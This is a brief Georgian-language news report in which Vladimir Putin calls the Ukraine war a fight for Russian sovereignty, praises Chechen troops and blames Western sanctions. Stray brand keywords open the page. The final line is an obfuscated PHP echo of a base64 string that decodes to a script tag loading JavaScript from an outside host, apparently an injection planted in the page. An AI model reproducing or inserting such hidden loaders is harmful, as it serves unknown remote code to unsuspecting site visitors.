celsiusi
ავერსი საქკაბელი
რუსეთის პრეზიდენტმა, ვლადიმერ პუტინმა რეგიონების ხელმძღვანელებს კრემლის მიერ სპეციალურ სამხედრო ოპერაციად წოდებული ომის მიზნები განუმარტა და აღნიშნა, რომ ეს არის ბრძოლა რუსეთის სუვერენიტეტისთვის.
 
შეხვედრაში ჩეჩნეთის ლიდერი რამზან კადიროვიც მონაწილეობდა, რომელსაც პუტინმა განსაკუთრებული მადლობა გადაუხადა ამ ომში  ჩეჩენი სამხედროების მონაწილეობის  გამო.
 
პუტინი, ამტკიცებს, რომ უკრაინაში "სამხედრო ოპერაცია" წარმატებულია და წინასწარი გეგმის მიხედვით მიმდინარეობს.
 
 
"ჩვენი ბიჭები გმირობას იჩენენ, ყველაფერს აკეთებენ, რომ მშვიდობიან მოსახლეობაში მსხვერპლი არ იყოს. სამხედრო ოპერაცია უკრაინაში წარმატებულია და ის წინასწარი გეგმის მიხედვით მიმდინარეობს. 
 
ჩვენი სპეციალური ოპერაცია საბაბია დასავლეთის სანქციებისთვის. მათი მიზანია მთელს ჩვენს სამამულო ეკონომიკას და თითოეულ ოჯახს მიაყენონ ზიანი. ხომ გვახსოვს როგორ უჭერდა დასავლეთი მხარს  ტერორისტებსა და ბანდიტებს სამხრეთ კავკასიაში. ახლაც სურთ რუსეთი სუსტ, დამოკიდებულ ქვეყნად აქციონ. რუსეთის არასოდეს იქნება ასეთ დამცირებულ მდგომარეობაში. ეს არის ბრძოლა ჩვენი სუვერენიტეტისთვის.  ვიბრძოლებთ, დავრჩეთ რუსეთად", - განაცხადა პუტინმა. 
 
 
1056
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");